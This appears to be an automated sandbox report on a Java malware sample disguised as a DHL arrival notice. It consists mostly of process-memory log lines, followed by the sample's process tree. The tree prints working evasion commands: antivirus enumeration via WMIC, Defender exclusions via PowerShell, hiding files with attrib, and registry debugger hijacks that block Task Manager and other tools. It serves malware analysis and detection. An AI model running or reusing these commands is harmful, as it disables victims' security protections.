PID 1824 wrote to memory of 1864	1824	cmd.exe	187
PID 1824 wrote to memory of 1864	1824	cmd.exe	187
PID 1824 wrote to memory of 316	1824	cmd.exe	188
PID 1824 wrote to memory of 316	1824	cmd.exe	188
PID 1824 wrote to memory of 316	1824	cmd.exe	188
PID 672 wrote to memory of 1336	672	java.exe	189
PID 672 wrote to memory of 1336	672	java.exe	189
PID 672 wrote to memory of 1336	672	java.exe	189
PID 1336 wrote to memory of 1408	1336	cmd.exe	190
PID 1336 wrote to memory of 1408	1336	cmd.exe	190
PID 1336 wrote to memory of 1408	1336	cmd.exe	190
PID 1336 wrote to memory of 1424	1336	cmd.exe	191
PID 1336 wrote to memory of 1424	1336	cmd.exe	191
PID 1336 wrote to memory of 1424	1336	cmd.exe	191
PID 672 wrote to memory of 1908	672	java.exe	192
PID 672 wrote to memory of 1908	672	java.exe	192
PID 672 wrote to memory of 1908	672	java.exe	192
PID 1908 wrote to memory of 1780	1908	cmd.exe	193
PID 1908 wrote to memory of 1780	1908	cmd.exe	193
PID 1908 wrote to memory of 1780	1908	cmd.exe	193
PID 1908 wrote to memory of 1952	1908	cmd.exe	194
PID 1908 wrote to memory of 1952	1908	cmd.exe	194
PID 1908 wrote to memory of 1952	1908	cmd.exe	194
PID 672 wrote to memory of 2016	672	java.exe	195
PID 672 wrote to memory of 2016	672	java.exe	195
PID 672 wrote to memory of 2016	672	java.exe	195
PID 2016 wrote to memory of 1960	2016	cmd.exe	196
PID 2016 wrote to memory of 1960	2016	cmd.exe	196
PID 2016 wrote to memory of 1960	2016	cmd.exe	196
PID 672 wrote to memory of 1476	672	java.exe	197
PID 672 wrote to memory of 1476	672	java.exe	197
PID 672 wrote to memory of 1476	672	java.exe	197
PID 2016 wrote to memory of 772	2016	cmd.exe	199
PID 2016 wrote to memory of 772	2016	cmd.exe	199
PID 2016 wrote to memory of 772	2016	cmd.exe	199
PID 672 wrote to memory of 1912	672	java.exe	200
PID 672 wrote to memory of 1912	672	java.exe	200
PID 672 wrote to memory of 1912	672	java.exe	200
PID 1912 wrote to memory of 832	1912	cmd.exe	201
PID 1912 wrote to memory of 832	1912	cmd.exe	201
PID 1912 wrote to memory of 832	1912	cmd.exe	201
PID 1912 wrote to memory of 2012	1912	cmd.exe	202
PID 1912 wrote to memory of 2012	1912	cmd.exe	202
PID 1912 wrote to memory of 2012	1912	cmd.exe	202
PID 672 wrote to memory of 1516	672	java.exe	203
PID 672 wrote to memory of 1516	672	java.exe	203
PID 672 wrote to memory of 1516	672	java.exe	203
PID 1516 wrote to memory of 1424	1516	cmd.exe	204
PID 1516 wrote to memory of 1424	1516	cmd.exe	204
PID 1516 wrote to memory of 1424	1516	cmd.exe	204
PID 1516 wrote to memory of 1180	1516	cmd.exe	205
PID 1516 wrote to memory of 1180	1516	cmd.exe	205
PID 1516 wrote to memory of 1180	1516	cmd.exe	205
PID 672 wrote to memory of 548	672	java.exe	206
PID 672 wrote to memory of 548	672	java.exe	206
PID 672 wrote to memory of 548	672	java.exe	206
PID 548 wrote to memory of 1928	548	cmd.exe	207
PID 548 wrote to memory of 1928	548	cmd.exe	207
PID 548 wrote to memory of 1928	548	cmd.exe	207
PID 548 wrote to memory of 1688	548	cmd.exe	208
PID 548 wrote to memory of 1688	548	cmd.exe	208
PID 548 wrote to memory of 1688	548	cmd.exe	208
PID 672 wrote to memory of 1764	672	java.exe	209
PID 672 wrote to memory of 1764	672	java.exe	209
PID 672 wrote to memory of 1764	672	java.exe	209
PID 672 wrote to memory of 1876	672	java.exe	210
PID 672 wrote to memory of 1876	672	java.exe	210
PID 672 wrote to memory of 1876	672	java.exe	210
PID 1764 wrote to memory of 1960	1764	cmd.exe	211
PID 1764 wrote to memory of 1960	1764	cmd.exe	211
PID 1764 wrote to memory of 1960	1764	cmd.exe	211
PID 1764 wrote to memory of 1488	1764	cmd.exe	213
PID 1764 wrote to memory of 1488	1764	cmd.exe	213
PID 1764 wrote to memory of 1488	1764	cmd.exe	213
PID 672 wrote to memory of 1756	672	java.exe	214
PID 672 wrote to memory of 1756	672	java.exe	214
PID 672 wrote to memory of 1756	672	java.exe	214
PID 1756 wrote to memory of 316	1756	cmd.exe	215
PID 1756 wrote to memory of 316	1756	cmd.exe	215
PID 1756 wrote to memory of 316	1756	cmd.exe	215
PID 1756 wrote to memory of 1772	1756	cmd.exe	216
PID 1756 wrote to memory of 1772	1756	cmd.exe	216
PID 1756 wrote to memory of 1772	1756	cmd.exe	216
PID 672 wrote to memory of 1832	672	java.exe	217
PID 672 wrote to memory of 1832	672	java.exe	217
PID 672 wrote to memory of 1832	672	java.exe	217
PID 1832 wrote to memory of 2004	1832	cmd.exe	218
PID 1832 wrote to memory of 2004	1832	cmd.exe	218
PID 1832 wrote to memory of 2004	1832	cmd.exe	218
PID 1832 wrote to memory of 1648	1832	cmd.exe	219
PID 1832 wrote to memory of 1648	1832	cmd.exe	219
PID 1832 wrote to memory of 1648	1832	cmd.exe	219
PID 672 wrote to memory of 360	672	java.exe	220
PID 672 wrote to memory of 360	672	java.exe	220
PID 672 wrote to memory of 360	672	java.exe	220
PID 360 wrote to memory of 1816	360	cmd.exe	221
PID 360 wrote to memory of 1816	360	cmd.exe	221
PID 360 wrote to memory of 1816	360	cmd.exe	221
PID 360 wrote to memory of 772	360	cmd.exe	222
PID 360 wrote to memory of 772	360	cmd.exe	222
PID 360 wrote to memory of 772	360	cmd.exe	222
PID 672 wrote to memory of 832	672	java.exe	223
PID 672 wrote to memory of 832	672	java.exe	223
PID 672 wrote to memory of 832	672	java.exe	223
PID 832 wrote to memory of 316	832	cmd.exe	224
PID 832 wrote to memory of 316	832	cmd.exe	224
PID 832 wrote to memory of 316	832	cmd.exe	224
PID 832 wrote to memory of 1772	832	cmd.exe	225
PID 832 wrote to memory of 1772	832	cmd.exe	225
PID 832 wrote to memory of 1772	832	cmd.exe	225
PID 672 wrote to memory of 1636	672	java.exe	226
PID 672 wrote to memory of 1636	672	java.exe	226
PID 672 wrote to memory of 1636	672	java.exe	226
PID 672 wrote to memory of 1180	672	java.exe	227
PID 672 wrote to memory of 1180	672	java.exe	227
PID 672 wrote to memory of 1180	672	java.exe	227
PID 1180 wrote to memory of 1792	1180	cmd.exe	229
PID 1180 wrote to memory of 1792	1180	cmd.exe	229
PID 1180 wrote to memory of 1792	1180	cmd.exe	229
PID 1180 wrote to memory of 2012	1180	cmd.exe	230
PID 1180 wrote to memory of 2012	1180	cmd.exe	230
PID 1180 wrote to memory of 2012	1180	cmd.exe	230
PID 672 wrote to memory of 1296	672	java.exe	231
PID 672 wrote to memory of 1296	672	java.exe	231
PID 672 wrote to memory of 1296	672	java.exe	231
PID 1296 wrote to memory of 1816	1296	cmd.exe	232
PID 1296 wrote to memory of 1816	1296	cmd.exe	232
PID 1296 wrote to memory of 1816	1296	cmd.exe	232
PID 1296 wrote to memory of 1080	1296	cmd.exe	233
PID 1296 wrote to memory of 1080	1296	cmd.exe	233
PID 1296 wrote to memory of 1080	1296	cmd.exe	233
PID 672 wrote to memory of 2004	672	java.exe	234
PID 672 wrote to memory of 2004	672	java.exe	234
PID 672 wrote to memory of 2004	672	java.exe	234
PID 2004 wrote to memory of 876	2004	cmd.exe	235
PID 2004 wrote to memory of 876	2004	cmd.exe	235
PID 2004 wrote to memory of 876	2004	cmd.exe	235
PID 2004 wrote to memory of 1484	2004	cmd.exe	236
PID 2004 wrote to memory of 1484	2004	cmd.exe	236
PID 2004 wrote to memory of 1484	2004	cmd.exe	236
PID 672 wrote to memory of 2012	672	java.exe	237
PID 672 wrote to memory of 2012	672	java.exe	237
PID 672 wrote to memory of 2012	672	java.exe	237
PID 2012 wrote to memory of 1960	2012	cmd.exe	238
PID 2012 wrote to memory of 1960	2012	cmd.exe	238
PID 2012 wrote to memory of 1960	2012	cmd.exe	238
PID 2012 wrote to memory of 1772	2012	cmd.exe	239
PID 2012 wrote to memory of 1772	2012	cmd.exe	239
PID 2012 wrote to memory of 1772	2012	cmd.exe	239
PID 672 wrote to memory of 1476	672	java.exe	240
PID 672 wrote to memory of 1476	672	java.exe	240
PID 672 wrote to memory of 1476	672	java.exe	240
PID 1476 wrote to memory of 1968	1476	cmd.exe	241
PID 1476 wrote to memory of 1968	1476	cmd.exe	241
PID 1476 wrote to memory of 1968	1476	cmd.exe	241
PID 1476 wrote to memory of 608	1476	cmd.exe	242
PID 1476 wrote to memory of 608	1476	cmd.exe	242
PID 1476 wrote to memory of 608	1476	cmd.exe	242
PID 672 wrote to memory of 1648	672	java.exe	243
PID 672 wrote to memory of 1648	672	java.exe	243
PID 672 wrote to memory of 1648	672	java.exe	243
PID 1648 wrote to memory of 1940	1648	cmd.exe	244
PID 1648 wrote to memory of 1940	1648	cmd.exe	244
PID 1648 wrote to memory of 1940	1648	cmd.exe	244
PID 672 wrote to memory of 368	672	java.exe	245
PID 672 wrote to memory of 368	672	java.exe	245
PID 672 wrote to memory of 368	672	java.exe	245
PID 1648 wrote to memory of 1968	1648	cmd.exe	247
PID 1648 wrote to memory of 1968	1648	cmd.exe	247
PID 1648 wrote to memory of 1968	1648	cmd.exe	247
PID 672 wrote to memory of 1636	672	java.exe	248
PID 672 wrote to memory of 1636	672	java.exe	248
PID 672 wrote to memory of 1636	672	java.exe	248
PID 1636 wrote to memory of 1940	1636	cmd.exe	249
PID 1636 wrote to memory of 1940	1636	cmd.exe	249
PID 1636 wrote to memory of 1940	1636	cmd.exe	249
PID 1636 wrote to memory of 772	1636	cmd.exe	250
PID 1636 wrote to memory of 772	1636	cmd.exe	250
PID 1636 wrote to memory of 772	1636	cmd.exe	250
PID 672 wrote to memory of 876	672	java.exe	251
PID 672 wrote to memory of 876	672	java.exe	251
PID 672 wrote to memory of 876	672	java.exe	251
PID 876 wrote to memory of 1960	876	cmd.exe	252
PID 876 wrote to memory of 1960	876	cmd.exe	252
PID 876 wrote to memory of 1960	876	cmd.exe	252
PID 876 wrote to memory of 1944	876	cmd.exe	253
PID 876 wrote to memory of 1944	876	cmd.exe	253
PID 876 wrote to memory of 1944	876	cmd.exe	253
PID 672 wrote to memory of 1940	672	java.exe	254
PID 672 wrote to memory of 1940	672	java.exe	254
PID 672 wrote to memory of 1940	672	java.exe	254
PID 1940 wrote to memory of 1948	1940	cmd.exe	255
PID 1940 wrote to memory of 1948	1940	cmd.exe	255
PID 1940 wrote to memory of 1948	1940	cmd.exe	255
PID 1940 wrote to memory of 1424	1940	cmd.exe	256
PID 1940 wrote to memory of 1424	1940	cmd.exe	256
PID 1940 wrote to memory of 1424	1940	cmd.exe	256
PID 672 wrote to memory of 608	672	java.exe	257
PID 672 wrote to memory of 608	672	java.exe	257
PID 672 wrote to memory of 608	672	java.exe	257
PID 608 wrote to memory of 1080	608	cmd.exe	258
PID 608 wrote to memory of 1080	608	cmd.exe	258
PID 608 wrote to memory of 1080	608	cmd.exe	258
PID 608 wrote to memory of 1484	608	cmd.exe	259
PID 608 wrote to memory of 1484	608	cmd.exe	259
PID 608 wrote to memory of 1484	608	cmd.exe	259
PID 672 wrote to memory of 1508	672	java.exe	260
PID 672 wrote to memory of 1508	672	java.exe	260
PID 672 wrote to memory of 1508	672	java.exe	260
PID 672 wrote to memory of 1696	672	java.exe	261
PID 672 wrote to memory of 1696	672	java.exe	261
PID 672 wrote to memory of 1696	672	java.exe	261
PID 1508 wrote to memory of 1928	1508	cmd.exe	263
PID 1508 wrote to memory of 1928	1508	cmd.exe	263
PID 1508 wrote to memory of 1928	1508	cmd.exe	263
PID 1508 wrote to memory of 2040	1508	cmd.exe	264
PID 1508 wrote to memory of 2040	1508	cmd.exe	264
PID 1508 wrote to memory of 2040	1508	cmd.exe	264
PID 672 wrote to memory of 1948	672	java.exe	265
PID 672 wrote to memory of 1948	672	java.exe	265
PID 672 wrote to memory of 1948	672	java.exe	265
PID 1948 wrote to memory of 1500	1948	cmd.exe	266
PID 1948 wrote to memory of 1500	1948	cmd.exe	266
PID 1948 wrote to memory of 1500	1948	cmd.exe	266
PID 1948 wrote to memory of 928	1948	cmd.exe	267
PID 1948 wrote to memory of 928	1948	cmd.exe	267
PID 1948 wrote to memory of 928	1948	cmd.exe	267
PID 672 wrote to memory of 1868	672	java.exe	268
PID 672 wrote to memory of 1868	672	java.exe	268
PID 672 wrote to memory of 1868	672	java.exe	268
PID 1868 wrote to memory of 2040	1868	cmd.exe	269
PID 1868 wrote to memory of 2040	1868	cmd.exe	269
PID 1868 wrote to memory of 2040	1868	cmd.exe	269
PID 1868 wrote to memory of 1960	1868	cmd.exe	270
PID 1868 wrote to memory of 1960	1868	cmd.exe	270
PID 1868 wrote to memory of 1960	1868	cmd.exe	270
PID 672 wrote to memory of 1624	672	java.exe	271
PID 672 wrote to memory of 1624	672	java.exe	271
PID 672 wrote to memory of 1624	672	java.exe	271
PID 1624 wrote to memory of 1568	1624	cmd.exe	272
PID 1624 wrote to memory of 1568	1624	cmd.exe	272
PID 1624 wrote to memory of 1568	1624	cmd.exe	272
PID 1624 wrote to memory of 1080	1624	cmd.exe	273
PID 1624 wrote to memory of 1080	1624	cmd.exe	273
PID 1624 wrote to memory of 1080	1624	cmd.exe	273
PID 672 wrote to memory of 1500	672	java.exe	274
PID 672 wrote to memory of 1500	672	java.exe	274
PID 672 wrote to memory of 1500	672	java.exe	274
PID 1500 wrote to memory of 1944	1500	cmd.exe	275
PID 1500 wrote to memory of 1944	1500	cmd.exe	275
PID 1500 wrote to memory of 1944	1500	cmd.exe	275
PID 1500 wrote to memory of 760	1500	cmd.exe	276
PID 1500 wrote to memory of 760	1500	cmd.exe	276
PID 1500 wrote to memory of 760	1500	cmd.exe	276
PID 672 wrote to memory of 1064	672	java.exe	277
PID 672 wrote to memory of 1064	672	java.exe	277
PID 672 wrote to memory of 1064	672	java.exe	277
PID 1064 wrote to memory of 1920	1064	cmd.exe	278
PID 1064 wrote to memory of 1920	1064	cmd.exe	278
PID 1064 wrote to memory of 1920	1064	cmd.exe	278
PID 1064 wrote to memory of 1492	1064	cmd.exe	279
PID 1064 wrote to memory of 1492	1064	cmd.exe	279
PID 1064 wrote to memory of 1492	1064	cmd.exe	279
PID 672 wrote to memory of 2040	672	java.exe	280
PID 672 wrote to memory of 2040	672	java.exe	280
PID 672 wrote to memory of 2040	672	java.exe	280
PID 2040 wrote to memory of 1936	2040	cmd.exe	281
PID 2040 wrote to memory of 1936	2040	cmd.exe	281
PID 2040 wrote to memory of 1936	2040	cmd.exe	281
PID 2040 wrote to memory of 1884	2040	cmd.exe	282
PID 2040 wrote to memory of 1884	2040	cmd.exe	282
PID 2040 wrote to memory of 1884	2040	cmd.exe	282
PID 672 wrote to memory of 1424	672	java.exe	283
PID 672 wrote to memory of 1424	672	java.exe	283
PID 672 wrote to memory of 1424	672	java.exe	283
PID 1424 wrote to memory of 1816	1424	cmd.exe	284
PID 1424 wrote to memory of 1816	1424	cmd.exe	284
PID 1424 wrote to memory of 1816	1424	cmd.exe	284
PID 1424 wrote to memory of 1944	1424	cmd.exe	285
PID 1424 wrote to memory of 1944	1424	cmd.exe	285
PID 1424 wrote to memory of 1944	1424	cmd.exe	285
PID 672 wrote to memory of 1928	672	java.exe	286
PID 672 wrote to memory of 1928	672	java.exe	286
PID 672 wrote to memory of 1928	672	java.exe	286
PID 1928 wrote to memory of 1652	1928	cmd.exe	287
PID 1928 wrote to memory of 1652	1928	cmd.exe	287
PID 1928 wrote to memory of 1652	1928	cmd.exe	287
PID 1928 wrote to memory of 1492	1928	cmd.exe	288
PID 1928 wrote to memory of 1492	1928	cmd.exe	288
PID 1928 wrote to memory of 1492	1928	cmd.exe	288
PID 672 wrote to memory of 1796	672	java.exe	289
PID 672 wrote to memory of 1796	672	java.exe	289
PID 672 wrote to memory of 1796	672	java.exe	289
PID 1796 wrote to memory of 700	1796	cmd.exe	290
PID 1796 wrote to memory of 700	1796	cmd.exe	290
PID 1796 wrote to memory of 700	1796	cmd.exe	290
PID 1796 wrote to memory of 1400	1796	cmd.exe	291
PID 1796 wrote to memory of 1400	1796	cmd.exe	291
PID 1796 wrote to memory of 1400	1796	cmd.exe	291
PID 672 wrote to memory of 1816	672	java.exe	292
PID 672 wrote to memory of 1816	672	java.exe	292
PID 672 wrote to memory of 1816	672	java.exe	292
PID 1816 wrote to memory of 772	1816	cmd.exe	293
PID 1816 wrote to memory of 772	1816	cmd.exe	293
PID 1816 wrote to memory of 772	1816	cmd.exe	293
PID 672 wrote to memory of 1900	672	java.exe	294
PID 672 wrote to memory of 1900	672	java.exe	294
PID 672 wrote to memory of 1900	672	java.exe	294
PID 1816 wrote to memory of 928	1816	cmd.exe	296
PID 1816 wrote to memory of 928	1816	cmd.exe	296
PID 1816 wrote to memory of 928	1816	cmd.exe	296
PID 672 wrote to memory of 1960	672	java.exe	297
PID 672 wrote to memory of 1960	672	java.exe	297
PID 672 wrote to memory of 1960	672	java.exe	297
PID 1960 wrote to memory of 772	1960	cmd.exe	298
PID 1960 wrote to memory of 772	1960	cmd.exe	298
PID 1960 wrote to memory of 772	1960	cmd.exe	298
PID 1960 wrote to memory of 760	1960	cmd.exe	299
PID 1960 wrote to memory of 760	1960	cmd.exe	299
PID 1960 wrote to memory of 760	1960	cmd.exe	299
PID 672 wrote to memory of 1884	672	java.exe	300
PID 672 wrote to memory of 1884	672	java.exe	300
PID 672 wrote to memory of 1884	672	java.exe	300
PID 1884 wrote to memory of 368	1884	cmd.exe	301
PID 1884 wrote to memory of 368	1884	cmd.exe	301
PID 1884 wrote to memory of 368	1884	cmd.exe	301
PID 1884 wrote to memory of 1944	1884	cmd.exe	302
PID 1884 wrote to memory of 1944	1884	cmd.exe	302
PID 1884 wrote to memory of 1944	1884	cmd.exe	302
PID 672 wrote to memory of 1900	672	java.exe	303
PID 672 wrote to memory of 1900	672	java.exe	303
PID 672 wrote to memory of 1900	672	java.exe	303
PID 1900 wrote to memory of 760	1900	cmd.exe	304
PID 1900 wrote to memory of 760	1900	cmd.exe	304
PID 1900 wrote to memory of 760	1900	cmd.exe	304
PID 1900 wrote to memory of 772	1900	cmd.exe	305
PID 1900 wrote to memory of 772	1900	cmd.exe	305
PID 1900 wrote to memory of 772	1900	cmd.exe	305
PID 672 wrote to memory of 1652	672	java.exe	306
PID 672 wrote to memory of 1652	672	java.exe	306
PID 672 wrote to memory of 1652	672	java.exe	306
PID 1652 wrote to memory of 1484	1652	cmd.exe	307
PID 1652 wrote to memory of 1484	1652	cmd.exe	307
PID 1652 wrote to memory of 1484	1652	cmd.exe	307
PID 1652 wrote to memory of 760	1652	cmd.exe	308
PID 1652 wrote to memory of 760	1652	cmd.exe	308
PID 1652 wrote to memory of 760	1652	cmd.exe	308
PID 672 wrote to memory of 1492	672	java.exe	309
PID 672 wrote to memory of 1492	672	java.exe	309
PID 672 wrote to memory of 1492	672	java.exe	309
PID 1492 wrote to memory of 772	1492	cmd.exe	310
PID 1492 wrote to memory of 772	1492	cmd.exe	310
PID 1492 wrote to memory of 772	1492	cmd.exe	310
PID 1492 wrote to memory of 760	1492	cmd.exe	311
PID 1492 wrote to memory of 760	1492	cmd.exe	311
PID 1492 wrote to memory of 760	1492	cmd.exe	311
PID 672 wrote to memory of 1484	672	java.exe	312
PID 672 wrote to memory of 1484	672	java.exe	312
PID 672 wrote to memory of 1484	672	java.exe	312
PID 1484 wrote to memory of 368	1484	cmd.exe	313
PID 1484 wrote to memory of 368	1484	cmd.exe	313
PID 1484 wrote to memory of 368	1484	cmd.exe	313
PID 1484 wrote to memory of 772	1484	cmd.exe	314
PID 1484 wrote to memory of 772	1484	cmd.exe	314
PID 1484 wrote to memory of 772	1484	cmd.exe	314
PID 672 wrote to memory of 2056	672	java.exe	315
PID 672 wrote to memory of 2056	672	java.exe	315
PID 672 wrote to memory of 2056	672	java.exe	315
PID 2056 wrote to memory of 2068	2056	cmd.exe	316
PID 2056 wrote to memory of 2068	2056	cmd.exe	316
PID 2056 wrote to memory of 2068	2056	cmd.exe	316
PID 2056 wrote to memory of 2080	2056	cmd.exe	317
PID 2056 wrote to memory of 2080	2056	cmd.exe	317
PID 2056 wrote to memory of 2080	2056	cmd.exe	317
PID 672 wrote to memory of 2092	672	java.exe	318
PID 672 wrote to memory of 2092	672	java.exe	318
PID 672 wrote to memory of 2092	672	java.exe	318
PID 2092 wrote to memory of 2104	2092	cmd.exe	319
PID 2092 wrote to memory of 2104	2092	cmd.exe	319
PID 2092 wrote to memory of 2104	2092	cmd.exe	319
PID 2092 wrote to memory of 2116	2092	cmd.exe	320
PID 2092 wrote to memory of 2116	2092	cmd.exe	320
PID 2092 wrote to memory of 2116	2092	cmd.exe	320
PID 672 wrote to memory of 2128	672	java.exe	321
PID 672 wrote to memory of 2128	672	java.exe	321
PID 672 wrote to memory of 2128	672	java.exe	321
PID 2128 wrote to memory of 2140	2128	cmd.exe	322
PID 2128 wrote to memory of 2140	2128	cmd.exe	322
PID 2128 wrote to memory of 2140	2128	cmd.exe	322
PID 2128 wrote to memory of 2152	2128	cmd.exe	323
PID 2128 wrote to memory of 2152	2128	cmd.exe	323
PID 2128 wrote to memory of 2152	2128	cmd.exe	323
PID 672 wrote to memory of 2164	672	java.exe	324
PID 672 wrote to memory of 2164	672	java.exe	324
PID 672 wrote to memory of 2164	672	java.exe	324
PID 2164 wrote to memory of 2176	2164	cmd.exe	325
PID 2164 wrote to memory of 2176	2164	cmd.exe	325
PID 2164 wrote to memory of 2176	2164	cmd.exe	325
PID 2164 wrote to memory of 2188	2164	cmd.exe	326
PID 2164 wrote to memory of 2188	2164	cmd.exe	326
PID 2164 wrote to memory of 2188	2164	cmd.exe	326
PID 672 wrote to memory of 2200	672	java.exe	327
PID 672 wrote to memory of 2200	672	java.exe	327
PID 672 wrote to memory of 2200	672	java.exe	327
PID 2200 wrote to memory of 2212	2200	cmd.exe	328
PID 2200 wrote to memory of 2212	2200	cmd.exe	328
PID 2200 wrote to memory of 2212	2200	cmd.exe	328
PID 2200 wrote to memory of 2224	2200	cmd.exe	329
PID 2200 wrote to memory of 2224	2200	cmd.exe	329
PID 2200 wrote to memory of 2224	2200	cmd.exe	329
PID 672 wrote to memory of 2236	672	java.exe	330
PID 672 wrote to memory of 2236	672	java.exe	330
PID 672 wrote to memory of 2236	672	java.exe	330
PID 2236 wrote to memory of 2248	2236	cmd.exe	331
PID 2236 wrote to memory of 2248	2236	cmd.exe	331
PID 2236 wrote to memory of 2248	2236	cmd.exe	331
PID 2236 wrote to memory of 2260	2236	cmd.exe	332
PID 2236 wrote to memory of 2260	2236	cmd.exe	332
PID 2236 wrote to memory of 2260	2236	cmd.exe	332
PID 672 wrote to memory of 2272	672	java.exe	333
PID 672 wrote to memory of 2272	672	java.exe	333
PID 672 wrote to memory of 2272	672	java.exe	333
PID 2272 wrote to memory of 2284	2272	cmd.exe	334
PID 2272 wrote to memory of 2284	2272	cmd.exe	334
PID 2272 wrote to memory of 2284	2272	cmd.exe	334
PID 2272 wrote to memory of 2296	2272	cmd.exe	335
PID 2272 wrote to memory of 2296	2272	cmd.exe	335
PID 2272 wrote to memory of 2296	2272	cmd.exe	335
PID 672 wrote to memory of 2308	672	java.exe	336
PID 672 wrote to memory of 2308	672	java.exe	336
PID 672 wrote to memory of 2308	672	java.exe	336
PID 672 wrote to memory of 2356	672	java.exe	338
PID 672 wrote to memory of 2356	672	java.exe	338
PID 672 wrote to memory of 2356	672	java.exe	338
PID 672 wrote to memory of 2404	672	java.exe	340
PID 672 wrote to memory of 2404	672	java.exe	340
PID 672 wrote to memory of 2404	672	java.exe	340
PID 672 wrote to memory of 2452	672	java.exe	342
PID 672 wrote to memory of 2452	672	java.exe	342
PID 672 wrote to memory of 2452	672	java.exe	342
PID 672 wrote to memory of 2500	672	java.exe	344
PID 672 wrote to memory of 2500	672	java.exe	344
PID 672 wrote to memory of 2500	672	java.exe	344

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1844	attrib.exe
1840	attrib.exe
1752	attrib.exe
1636	attrib.exe
1892	attrib.exe
1908	attrib.exe
1936	attrib.exe
1948	attrib.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\NOTIFICA DI ARRIVO DHL_PDF.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:672
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1272
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1892
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1908
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1936
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:1948
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1844
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1840
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1752
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:1636
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1184
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1972
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:2012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2040
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:2028
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1420
- C:\Windows\System32\reg.exe
